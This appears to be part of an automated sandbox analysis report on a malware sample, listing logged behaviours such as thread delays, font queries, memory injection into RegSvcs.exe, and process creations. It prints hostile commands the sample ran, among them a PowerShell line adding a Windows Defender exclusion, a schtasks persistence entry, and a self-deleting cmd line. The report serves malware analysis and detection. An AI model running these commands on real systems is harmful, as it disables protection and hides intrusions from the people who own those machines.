Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598683
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598202
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596998
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594969
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594281
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594172

Source: RegSvcs.exe, 00000006.00000002.1822974786.0000000001466000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1873460694.0000000000F62000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe"			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1174008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 424000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A9B008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmpAE14.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
